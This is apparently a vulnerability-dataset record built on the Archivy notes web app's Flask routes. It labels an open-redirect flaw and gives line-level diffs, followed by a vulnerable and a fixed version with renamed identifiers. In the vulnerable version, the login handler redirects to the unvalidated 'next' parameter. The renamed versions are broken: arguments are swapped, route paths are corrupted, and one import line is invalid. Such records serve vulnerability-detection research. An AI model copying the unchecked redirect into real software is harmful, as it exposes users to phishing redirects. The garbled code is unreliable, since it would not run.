dataobjs = data.get_items(load_content=False)
version = require("archivy")[0].version
SEP = sep
# check windows parsing for js (https://github.com/Uzay-G/archivy/issues/115)
if SEP == "\\":
SEP += "\\"
return dict(dataobjs=dataobjs, SEP=SEP, version=version)
@app.before_request
def check_perms():
allowed_path = (
request.path.startswith("/login")
or request.path.startswith("/static")
or request.path.startswith("/api/login")
)
if not current_user.is_authenticated and not allowed_path:
return redirect(url_for("login", next=request.path))
return
@app.route("/")
@app.route("/index")
def index():
path = request.args.get("path", "").lstrip("/")
try:
files = data.get_items(path=path)
except FileNotFoundError:
flash("Directory does not exist.", "error")
return redirect("/")
return render_template(
"home.html",
title=path or "root",
search_enabled=app.config["SEARCH_CONF"]["enabled"],
dir=files,
current_path=path,
new_folder_form=forms.NewFolderForm(),
delete_form=forms.DeleteFolderForm(),
rename_form=forms.RenameDirectoryForm(),
view_only=0,
search_engine=app.config["SEARCH_CONF"]["engine"],
)
# TODO: refactor two following methods
@app.route("/bookmarks/new", methods=["GET", "POST"])
def new_bookmark():
default_dir = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
form = forms.NewBookmarkForm(path=default_dir)
form.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if form.validate_on_submit():
path = form.path.data
tags = form.tags.data.split(",") if form.tags.data != "" else []
tags = [tag.strip() for tag in tags]
bookmark = DataObj(url=form.url.data, tags=tags, path=path, type="bookmark")
bookmark.process_bookmark_url()
bookmark_id = bookmark.insert()
if bookmark_id:
flash("Bookmark Saved!", "success")
return redirect(f"/dataobj/{bookmark_id}")
else:
flash(bookmark.error, "error")
return redirect("/bookmarks/new")
# for bookmarklet
form.url.data = request.args.get("url", "")
path = request.args.get("path", default_dir).strip("/")
# handle empty argument
form.path.data = path
return render_template("dataobjs/new.html", title="New Bookmark", form=form)
@app.route("/notes/new", methods=["GET", "POST"])
def new_note():
form = forms.NewNoteForm()
default_dir = "root directory"
form.path.choices = [("", default_dir)] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if form.validate_on_submit():
path = form.path.data
tags = form.tags.data.split(",") if form.tags.data != "" else []
tags = [tag.strip() for tag in tags]
note = DataObj(title=form.title.data, path=path, tags=tags, type="note")
note_id = note.insert()
if note_id:
flash("Note Saved!", "success")
return redirect(f"/dataobj/{note_id}")
path = request.args.get("path", default_dir).strip("/")
# handle empty argument
form.path.data = path
return render_template("/dataobjs/new.html", title="New Note", form=form)
@app.route("/tags")
def show_all_tags():
if not app.config["SEARCH_CONF"]["engine"] == "ripgrep" and not which("rg"):
flash("Ripgrep must be installed to view pages about embedded tags.", "error")
return redirect("/")
tags = sorted(get_all_tags(force=True))
return render_template("tags/all.html", title="All Tags", tags=tags)
@app.route("/tags/<tag_name>")
def show_tag(tag_name):
if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
flash(
"Search (for example ripgrep) must be installed to view pages about embedded tags.",
"error",
)
return redirect("/")
results = search(f"#{tag_name}#", strict=True)
res_ids = set(
[item["id"] for item in results]
) # avoid duplication of results between context-aware embedded tags and metadata ones
for res in search_frontmatter_tags(tag_name):
if res["id"] not in res_ids:
results.append(res)
return render_template(
"tags/show.html",
title=f"Tags - {tag_name}",
tag_name=tag_name,
search_result=results,
)
@app.route("/dataobj/<int:dataobj_id>")
def show_dataobj(dataobj_id):
dataobj = data.get_item(dataobj_id)
get_title_id_pairs = lambda x: (x["title"], x["id"])
titles = list(
map(get_title_id_pairs, data.get_items(structured=False, load_content=False))
)
if not dataobj:
flash("Data could not be found!", "error")
return redirect("/")
if request.args.get("raw") == "1":
return frontmatter.dumps(dataobj)
backlinks = []
if app.config["SEARCH_CONF"]["enabled"]:
if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
query = f"\|{dataobj_id}]]"
else:
query = f"|{dataobj_id})]]"
backlinks = search(query, strict=True)
# Form for moving data into another folder
move_form = forms.MoveItemForm()
move_form.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
post_title_form = forms.TitleForm()
post_title_form.title.data = dataobj["title"]
# Get all tags
tag_list = get_all_tags()
# and the ones present in this dataobj
embedded_tags = set()
PATTERN = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
for match in re.finditer(PATTERN, dataobj.content):
embedded_tags.add(match.group(0).replace("#", "").lstrip())
return render_template(
"dataobjs/show.html",
title=dataobj["title"],
dataobj=dataobj,
backlinks=backlinks,
current_path=dataobj["dir"],
form=forms.DeleteDataForm(),
view_only=0,
search_enabled=app.config["SEARCH_CONF"]["enabled"],
post_title_form=post_title_form,
move_form=move_form,
tag_list=tag_list,
embedded_tags=embedded_tags,
titles=titles,
)
@app.route("/dataobj/move/<int:dataobj_id>", methods=["POST"])
def move_item(dataobj_id):
form = forms.MoveItemForm()
out_dir = form.path.data if form.path.data != "" else "root directory"
if form.path.data == None:
flash("No path specified.")
return redirect(f"/dataobj/{dataobj_id}")
try:
if data.move_item(dataobj_id, form.path.data):
flash(f"Data successfully moved to {out_dir}.", "success")
return redirect(f"/dataobj/{dataobj_id}")
else:
flash(f"Data could not be moved to {out_dir}.", "error")
return redirect(f"/dataobj/{dataobj_id}")
except FileNotFoundError:
flash("Data not found.", "error")
return redirect("/")
except FileExistsError:
flash("Data already in target directory.", "error")
return redirect(f"/dataobj/{dataobj_id}")
@app.route("/dataobj/delete/<int:dataobj_id>", methods=["POST"])
def delete_data(dataobj_id):
try:
data.delete_item(dataobj_id)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def login():
form = forms.UserForm()
if form.validate_on_submit():
db = get_db()
user = db.search(
(Query().username == form.username.data) & (Query().type == "user")
)
if user and check_password_hash(user[0]["hashed_password"], form.password.data):
user = User.from_db(user[0])
login_user(user, remember=True)
flash("Login successful!", "success")
next_url = request.args.get("next")
if next_url and is_safe_redirect_url(next_url):
return redirect(next_url)
else:
return redirect("/")
flash("Invalid credentials", "error")
return redirect("/login")
return render_template("users/login.html", form=form, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def logout():
logout_user()
flash("Logged out successfully", "success")
return redirect("/")
@app.route("/user/edit", methods=["GET", "POST"])
def edit_user():
form = forms.UserForm()
if form.validate_on_submit():
db = get_db()
db.update(
{
"username": form.username.data,
"hashed_password": generate_password_hash(form.password.data),
},
doc_ids=[current_user.id],
)
flash("Information saved!", "success")
return redirect("/")
form.username.data = current_user.username
return render_template("users/edit.html", form=form, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def create_folder():
form = forms.NewFolderForm()
if form.validate_on_submit():
path = Path(form.parent_dir.data.strip("/")) / form.new_dir.data
new_path = data.create_dir(str(path))
flash("Folder successfully created.", "success")
return redirect(f"/?path={new_path}")
flash("Could not create folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def delete_folder():
form = forms.DeleteFolderForm()
if form.validate_on_submit():
if data.delete_dir(form.dir_name.data):
flash("Folder successfully deleted.", "success")
return redirect("/")
else:
flash("Folder not found.", "error")
return redirect(request.referrer or "/", 404)
flash("Could not delete folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def rename_folder():
form = forms.RenameDirectoryForm()
if form.validate_on_submit():
try:
new_path = data.rename_folder(form.current_path.data, form.new_name.data)
if not new_path:
flash("Invalid input.", "error")
else:
flash("Renamed successfully.", "success")
return redirect(f"/?path={new_path}")
except FileNotFoundError:
flash("Directory not found.", "error")
except FileExistsError:
flash("Target directory exists.", "error")
return redirect("/")
@app.route("/bookmarklet")
def bookmarklet():
return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<filename>")
def serve_image(filename):
if filename and data.valid_image_filename(filename):
image_path = data.image_exists(filename)
if image_path:
return send_file(image_path)
else:
return "Image not found", 404
else:
return "Invalid file request", 413
@app.route("/static/custom.css")
def custom_css():
if not app.config["THEME_CONF"].get("use_custom_css", False):
return ""
return send_from_directory(
Path(app.config["USER_DIR"]) / "css",
app.config["THEME_CONF"]["custom_css_file"],
)
@app.route("/config", methods=["GET", "POST"])
def config():
"""
Web View to edit and update configuration.
"""
def update_config_value(key, val, dictionary):
if key != "SECRET_KEY":
if type(val) is dict:
for k, v in val.items():
update_config_value(k, v, dictionary[key])
else:
dictionary[key] = val
form = forms.config_form(app.config)
default = vars(Config())
if form.validate_on_submit():
changed_config = Config()
changed_config.override(form.data)
for k, v in vars(changed_config).items():
# propagate changes to configuration
update_config_value(k, v, app.config)
write_config(vars(changed_config)) # save to filesystem config
flash("Config successfully updated.", "success")
elif request.method == "POST":
flash("Could not update config.", "error")
return render_template(
"config.html", conf=form, default=default, title="Edit Config"
)
@csrf.exempt # exempt from CSRF to be able to submit info directly from bookmarklet
@app.route("/save_from_bookmarklet", methods=["POST"])
def save_raw_url():
"""
Used in the bookmarklet - Saves a URL by taking its raw HTML.
POST parameters:
- html
- url
"""
html = request.form.get("html")
if not html:
return "No HTML provided", 400
bookmark = DataObj(url=request.form.get("url"), type="bookmark")
bookmark.process_bookmark_url(html)
if bookmark.insert():
return redirect(f"/dataobj/{bookmark.id}")
else:
return "Could not save bookmark", 500
| open_redirect | {
"code": [
"from archivy.helpers import get_db, write_config",
" return redirect(next_url or \"/\")"
],
"line_no": [
22,
267
]
} | {
"code": [
"from archivy.helpers import get_db, write_config, is_safe_redirect_url",
" if next_url and is_safe_redirect_url(next_url):",
" else:",
" return redirect(\"/\")"
],
"line_no": [
22,
267,
269,
270
]
} | from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import .login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def FUNC_0():
VAR_3 = data.get_items(load_content=False)
VAR_4 = require("archivy")[0].version
VAR_5 = sep
if VAR_5 == "\\":
VAR_5 += "\\"
return dict(VAR_3=dataobjs, VAR_5=SEP, VAR_4=version)
@app.before_request
def FUNC_1():
VAR_6 = (
request.path.startswith("/login")
or request.path.startswith("/static")
or request.path.startswith("/api/login")
)
if not current_user.is_authenticated and not VAR_6:
return redirect(url_for("login", next=request.path))
return
@app.route("/")
@app.route("/index")
def FUNC_2():
VAR_7 = request.args.get("path", "").lstrip("/")
try:
VAR_29 = data.get_items(VAR_7=path)
except FileNotFoundError:
flash("Directory does not exist.", "error")
return redirect("/")
return render_template(
"home.html",
title=VAR_7 or "root",
search_enabled=app.config["SEARCH_CONF"]["enabled"],
dir=VAR_29,
current_path=VAR_7,
new_folder_form=forms.NewFolderForm(),
delete_form=forms.DeleteFolderForm(),
rename_form=forms.RenameDirectoryForm(),
view_only=0,
search_engine=app.config["SEARCH_CONF"]["engine"],
)
@app.route("/bookmarks/new", methods=["GET", "POST"])
def FUNC_3():
VAR_8 = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
VAR_9 = forms.NewBookmarkForm(VAR_7=VAR_8)
VAR_9.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_28 = DataObj(url=VAR_9.url.data, VAR_10=tags, VAR_7=path, type="bookmark")
VAR_28.process_bookmark_url()
VAR_30 = VAR_28.insert()
if VAR_30:
flash("Bookmark Saved!", "success")
return redirect(f"/VAR_13/{VAR_30}")
else:
flash(VAR_28.error, "error")
return redirect("/bookmarks/new")
VAR_9.url.data = request.args.get("url", "")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("dataobjs/new.html", title="New Bookmark", VAR_9=form)
@app.route("/notes/new", methods=["GET", "POST"])
def FUNC_4():
VAR_9 = forms.NewNoteForm()
VAR_8 = "root directory"
VAR_9.path.choices = [("", VAR_8)] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_31 = DataObj(title=VAR_9.title.data, VAR_7=path, VAR_10=tags, type="note")
VAR_32 = VAR_31.insert()
if VAR_32:
flash("Note Saved!", "success")
return redirect(f"/VAR_13/{VAR_32}")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("/VAR_3/new.html", title="New Note", VAR_9=form)
@app.route("/tags")
def FUNC_5():
if not app.config["SEARCH_CONF"]["engine"] == "ripgrep" and not which("rg"):
flash("Ripgrep must be installed to view pages about embedded VAR_10.", "error")
return redirect("/")
VAR_10 = sorted(get_all_tags(force=True))
return render_template("tags/all.html", title="All Tags", VAR_10=tags)
@app.route("/VAR_10/<VAR_0>")
def FUNC_6(VAR_0):
if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
flash(
"Search (for example ripgrep) must be installed to view pages about embedded VAR_10.",
"error",
)
return redirect("/")
VAR_11 = search(f"#{VAR_0}#", strict=True)
VAR_12 = set(
[item["id"] for item in VAR_11]
) # avoid duplication of VAR_11 between context-aware embedded VAR_10 and metadata ones
for res in search_frontmatter_tags(VAR_0):
if res["id"] not in VAR_12:
VAR_11.append(res)
return render_template(
"tags/show.html",
title=f"Tags - {VAR_0}",
VAR_0=tag_name,
search_result=VAR_11,
)
@app.route("/VAR_13/<int:VAR_1>")
def FUNC_7(VAR_1):
VAR_13 = data.get_item(VAR_1)
VAR_14 = lambda x: (x["title"], x["id"])
VAR_15 = list(
map(VAR_14, data.get_items(structured=False, load_content=False))
)
if not VAR_13:
flash("Data could not be found!", "error")
return redirect("/")
if request.args.get("raw") == "1":
return frontmatter.dumps(VAR_13)
VAR_16 = []
if app.config["SEARCH_CONF"]["enabled"]:
if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
VAR_38 = f"\|{VAR_1}]]"
else:
VAR_38 = f"|{VAR_1})]]"
VAR_16 = search(VAR_38, strict=True)
VAR_17 = forms.MoveItemForm()
VAR_17.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
VAR_18 = forms.TitleForm()
VAR_18.title.data = VAR_13["title"]
VAR_19 = get_all_tags()
VAR_20 = set()
VAR_21 = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
for match in re.finditer(VAR_21, VAR_13.content):
VAR_20.add(match.group(0).replace("#", "").lstrip())
return render_template(
"dataobjs/show.html",
title=VAR_13["title"],
VAR_13=dataobj,
VAR_16=backlinks,
current_path=VAR_13["dir"],
VAR_9=forms.DeleteDataForm(),
view_only=0,
search_enabled=app.config["SEARCH_CONF"]["enabled"],
VAR_18=post_title_form,
VAR_17=move_form,
VAR_19=tag_list,
VAR_20=embedded_tags,
VAR_15=titles,
)
@app.route("/VAR_13/move/<int:VAR_1>", methods=["POST"])
def FUNC_8(VAR_1):
VAR_9 = forms.MoveItemForm()
VAR_22 = VAR_9.path.data if VAR_9.path.data != "" else "root directory"
if VAR_9.path.data == None:
flash("No VAR_7 specified.")
return redirect(f"/VAR_13/{VAR_1}")
try:
if data.move_item(VAR_1, VAR_9.path.data):
flash(f"Data successfully moved to {VAR_22}.", "success")
return redirect(f"/VAR_13/{VAR_1}")
else:
flash(f"Data could not be moved to {VAR_22}.", "error")
return redirect(f"/VAR_13/{VAR_1}")
except FileNotFoundError:
flash("Data not found.", "error")
return redirect("/")
except FileExistsError:
flash("Data already in target directory.", "error")
return redirect(f"/VAR_13/{VAR_1}")
@app.route("/VAR_13/delete/<int:VAR_1>", methods=["POST"])
def FUNC_9(VAR_1):
try:
data.delete_item(VAR_1)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def FUNC_10():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_34 = VAR_33.search(
(Query().username == VAR_9.username.data) & (Query().type == "user")
)
if VAR_34 and check_password_hash(VAR_34[0]["hashed_password"], VAR_9.password.data):
VAR_34 = User.from_db(VAR_34[0])
login_user(VAR_34, remember=True)
flash("Login successful!", "success")
VAR_39 = request.args.get("next")
return redirect(VAR_39 or "/")
flash("Invalid credentials", "error")
return redirect("/login")
return render_template("users/FUNC_10.html", VAR_9=VAR_9, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def FUNC_11():
logout_user()
flash("Logged out successfully", "success")
return redirect("/")
@app.route("/VAR_34/edit", methods=["GET", "POST"])
def FUNC_12():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_33.update(
{
"username": VAR_9.username.data,
"hashed_password": generate_password_hash(VAR_9.password.data),
},
doc_ids=[current_user.id],
)
flash("Information saved!", "success")
return redirect("/")
VAR_9.username.data = current_user.username
return render_template("users/edit.html", VAR_9=VAR_9, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def FUNC_13():
VAR_9 = forms.NewFolderForm()
if VAR_9.validate_on_submit():
VAR_7 = Path(VAR_9.parent_dir.data.strip("/")) / VAR_9.new_dir.data
VAR_35 = data.create_dir(str(VAR_7))
flash("Folder successfully created.", "success")
return redirect(f"/?VAR_7={VAR_35}")
flash("Could not create folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def FUNC_14():
VAR_9 = forms.DeleteFolderForm()
if VAR_9.validate_on_submit():
if data.delete_dir(VAR_9.dir_name.data):
flash("Folder successfully deleted.", "success")
return redirect("/")
else:
flash("Folder not found.", "error")
return redirect(request.referrer or "/", 404)
flash("Could not delete folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def FUNC_15():
VAR_9 = forms.RenameDirectoryForm()
if VAR_9.validate_on_submit():
try:
VAR_35 = data.rename_folder(VAR_9.current_path.data, VAR_9.new_name.data)
if not VAR_35:
flash("Invalid input.", "error")
else:
flash("Renamed successfully.", "success")
return redirect(f"/?VAR_7={VAR_35}")
except FileNotFoundError:
flash("Directory not found.", "error")
except FileExistsError:
flash("Target directory exists.", "error")
return redirect("/")
@app.route("/bookmarklet")
def FUNC_16():
return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<VAR_2>")
def FUNC_17(VAR_2):
if VAR_2 and data.valid_image_filename(VAR_2):
VAR_36 = data.image_exists(VAR_2)
if VAR_36:
return send_file(VAR_36)
else:
return "Image not found", 404
else:
return "Invalid file request", 413
@app.route("/static/custom.css")
def FUNC_18():
if not app.config["THEME_CONF"].get("use_custom_css", False):
return ""
return send_from_directory(
Path(app.config["USER_DIR"]) / "css",
app.config["THEME_CONF"]["custom_css_file"],
)
@app.route("/config", methods=["GET", "POST"])
def FUNC_19():
def FUNC_21(VAR_23, VAR_24, VAR_25):
if VAR_23 != "SECRET_KEY":
if type(VAR_24) is dict:
for k, v in VAR_24.items():
FUNC_21(k, v, VAR_25[VAR_23])
else:
VAR_25[VAR_23] = VAR_24
VAR_9 = forms.config_form(app.config)
VAR_26 = vars(Config())
if VAR_9.validate_on_submit():
VAR_37 = Config()
VAR_37.override(VAR_9.data)
for k, v in vars(VAR_37).items():
FUNC_21(k, v, app.config)
write_config(vars(VAR_37)) # save to filesystem FUNC_19
flash("Config successfully updated.", "success")
elif request.method == "POST":
flash("Could not update FUNC_19.", "error")
return render_template(
"config.html", conf=VAR_9, VAR_26=default, title="Edit Config"
)
@csrf.exempt # exempt from CSRF to be able to submit info directly from FUNC_16
@app.route("/save_from_bookmarklet", methods=["POST"])
def FUNC_20():
VAR_27 = request.form.get("html")
if not VAR_27:
return "No HTML provided", 400
VAR_28 = DataObj(url=request.form.get("url"), type="bookmark")
VAR_28.process_bookmark_url(VAR_27)
if VAR_28.insert():
return redirect(f"/VAR_13/{VAR_28.id}")
else:
return "Could not save bookmark", 500
| from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import .login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config, is_safe_redirect_url
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def FUNC_0():
VAR_3 = data.get_items(load_content=False)
VAR_4 = require("archivy")[0].version
VAR_5 = sep
if VAR_5 == "\\":
VAR_5 += "\\"
return dict(VAR_3=dataobjs, VAR_5=SEP, VAR_4=version)
@app.before_request
def FUNC_1():
VAR_6 = (
request.path.startswith("/login")
or request.path.startswith("/static")
or request.path.startswith("/api/login")
)
if not current_user.is_authenticated and not VAR_6:
return redirect(url_for("login", next=request.path))
return
@app.route("/")
@app.route("/index")
def FUNC_2():
VAR_7 = request.args.get("path", "").lstrip("/")
try:
VAR_29 = data.get_items(VAR_7=path)
except FileNotFoundError:
flash("Directory does not exist.", "error")
return redirect("/")
return render_template(
"home.html",
title=VAR_7 or "root",
search_enabled=app.config["SEARCH_CONF"]["enabled"],
dir=VAR_29,
current_path=VAR_7,
new_folder_form=forms.NewFolderForm(),
delete_form=forms.DeleteFolderForm(),
rename_form=forms.RenameDirectoryForm(),
view_only=0,
search_engine=app.config["SEARCH_CONF"]["engine"],
)
@app.route("/bookmarks/new", methods=["GET", "POST"])
def FUNC_3():
VAR_8 = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
VAR_9 = forms.NewBookmarkForm(VAR_7=VAR_8)
VAR_9.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_28 = DataObj(url=VAR_9.url.data, VAR_10=tags, VAR_7=path, type="bookmark")
VAR_28.process_bookmark_url()
VAR_30 = VAR_28.insert()
if VAR_30:
flash("Bookmark Saved!", "success")
return redirect(f"/VAR_13/{VAR_30}")
else:
flash(VAR_28.error, "error")
return redirect("/bookmarks/new")
VAR_9.url.data = request.args.get("url", "")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("dataobjs/new.html", title="New Bookmark", VAR_9=form)
@app.route("/notes/new", methods=["GET", "POST"])
def FUNC_4():
VAR_9 = forms.NewNoteForm()
VAR_8 = "root directory"
VAR_9.path.choices = [("", VAR_8)] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_31 = DataObj(title=VAR_9.title.data, VAR_7=path, VAR_10=tags, type="note")
VAR_32 = VAR_31.insert()
if VAR_32:
flash("Note Saved!", "success")
return redirect(f"/VAR_13/{VAR_32}")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("/VAR_3/new.html", title="New Note", VAR_9=form)
@app.route("/tags")
def FUNC_5():
if not app.config["SEARCH_CONF"]["engine"] == "ripgrep" and not which("rg"):
flash("Ripgrep must be installed to view pages about embedded VAR_10.", "error")
return redirect("/")
VAR_10 = sorted(get_all_tags(force=True))
return render_template("tags/all.html", title="All Tags", VAR_10=tags)
@app.route("/VAR_10/<VAR_0>")
def FUNC_6(VAR_0):
if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
flash(
"Search (for example ripgrep) must be installed to view pages about embedded VAR_10.",
"error",
)
return redirect("/")
VAR_11 = search(f"#{VAR_0}#", strict=True)
VAR_12 = set(
[item["id"] for item in VAR_11]
) # avoid duplication of VAR_11 between context-aware embedded VAR_10 and metadata ones
for res in search_frontmatter_tags(VAR_0):
if res["id"] not in VAR_12:
VAR_11.append(res)
return render_template(
"tags/show.html",
title=f"Tags - {VAR_0}",
VAR_0=tag_name,
search_result=VAR_11,
)
@app.route("/VAR_13/<int:VAR_1>")
def FUNC_7(VAR_1):
VAR_13 = data.get_item(VAR_1)
VAR_14 = lambda x: (x["title"], x["id"])
VAR_15 = list(
map(VAR_14, data.get_items(structured=False, load_content=False))
)
if not VAR_13:
flash("Data could not be found!", "error")
return redirect("/")
if request.args.get("raw") == "1":
return frontmatter.dumps(VAR_13)
VAR_16 = []
if app.config["SEARCH_CONF"]["enabled"]:
if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
VAR_38 = f"\|{VAR_1}]]"
else:
VAR_38 = f"|{VAR_1})]]"
VAR_16 = search(VAR_38, strict=True)
VAR_17 = forms.MoveItemForm()
VAR_17.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
VAR_18 = forms.TitleForm()
VAR_18.title.data = VAR_13["title"]
VAR_19 = get_all_tags()
VAR_20 = set()
VAR_21 = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
for match in re.finditer(VAR_21, VAR_13.content):
VAR_20.add(match.group(0).replace("#", "").lstrip())
return render_template(
"dataobjs/show.html",
title=VAR_13["title"],
VAR_13=dataobj,
VAR_16=backlinks,
current_path=VAR_13["dir"],
VAR_9=forms.DeleteDataForm(),
view_only=0,
search_enabled=app.config["SEARCH_CONF"]["enabled"],
VAR_18=post_title_form,
VAR_17=move_form,
VAR_19=tag_list,
VAR_20=embedded_tags,
VAR_15=titles,
)
@app.route("/VAR_13/move/<int:VAR_1>", methods=["POST"])
def FUNC_8(VAR_1):
VAR_9 = forms.MoveItemForm()
VAR_22 = VAR_9.path.data if VAR_9.path.data != "" else "root directory"
if VAR_9.path.data == None:
flash("No VAR_7 specified.")
return redirect(f"/VAR_13/{VAR_1}")
try:
if data.move_item(VAR_1, VAR_9.path.data):
flash(f"Data successfully moved to {VAR_22}.", "success")
return redirect(f"/VAR_13/{VAR_1}")
else:
flash(f"Data could not be moved to {VAR_22}.", "error")
return redirect(f"/VAR_13/{VAR_1}")
except FileNotFoundError:
flash("Data not found.", "error")
return redirect("/")
except FileExistsError:
flash("Data already in target directory.", "error")
return redirect(f"/VAR_13/{VAR_1}")
@app.route("/VAR_13/delete/<int:VAR_1>", methods=["POST"])
def FUNC_9(VAR_1):
try:
data.delete_item(VAR_1)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def FUNC_10():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_34 = VAR_33.search(
(Query().username == VAR_9.username.data) & (Query().type == "user")
)
if VAR_34 and check_password_hash(VAR_34[0]["hashed_password"], VAR_9.password.data):
VAR_34 = User.from_db(VAR_34[0])
login_user(VAR_34, remember=True)
flash("Login successful!", "success")
VAR_39 = request.args.get("next")
if VAR_39 and is_safe_redirect_url(VAR_39):
return redirect(VAR_39)
else:
return redirect("/")
flash("Invalid credentials", "error")
return redirect("/login")
return render_template("users/FUNC_10.html", VAR_9=VAR_9, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def FUNC_11():
logout_user()
flash("Logged out successfully", "success")
return redirect("/")
@app.route("/VAR_34/edit", methods=["GET", "POST"])
def FUNC_12():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_33.update(
{
"username": VAR_9.username.data,
"hashed_password": generate_password_hash(VAR_9.password.data),
},
doc_ids=[current_user.id],
)
flash("Information saved!", "success")
return redirect("/")
VAR_9.username.data = current_user.username
return render_template("users/edit.html", VAR_9=VAR_9, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def FUNC_13():
VAR_9 = forms.NewFolderForm()
if VAR_9.validate_on_submit():
VAR_7 = Path(VAR_9.parent_dir.data.strip("/")) / VAR_9.new_dir.data
VAR_35 = data.create_dir(str(VAR_7))
flash("Folder successfully created.", "success")
return redirect(f"/?VAR_7={VAR_35}")
flash("Could not create folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def FUNC_14():
VAR_9 = forms.DeleteFolderForm()
if VAR_9.validate_on_submit():
if data.delete_dir(VAR_9.dir_name.data):
flash("Folder successfully deleted.", "success")
return redirect("/")
else:
flash("Folder not found.", "error")
return redirect(request.referrer or "/", 404)
flash("Could not delete folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def FUNC_15():
VAR_9 = forms.RenameDirectoryForm()
if VAR_9.validate_on_submit():
try:
VAR_35 = data.rename_folder(VAR_9.current_path.data, VAR_9.new_name.data)
if not VAR_35:
flash("Invalid input.", "error")
else:
flash("Renamed successfully.", "success")
return redirect(f"/?VAR_7={VAR_35}")
except FileNotFoundError:
flash("Directory not found.", "error")
except FileExistsError:
flash("Target directory exists.", "error")
return redirect("/")
@app.route("/bookmarklet")
def FUNC_16():
return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<VAR_2>")
def FUNC_17(VAR_2):
if VAR_2 and data.valid_image_filename(VAR_2):
VAR_36 = data.image_exists(VAR_2)
if VAR_36:
return send_file(VAR_36)
else:
return "Image not found", 404
else:
return "Invalid file request", 413
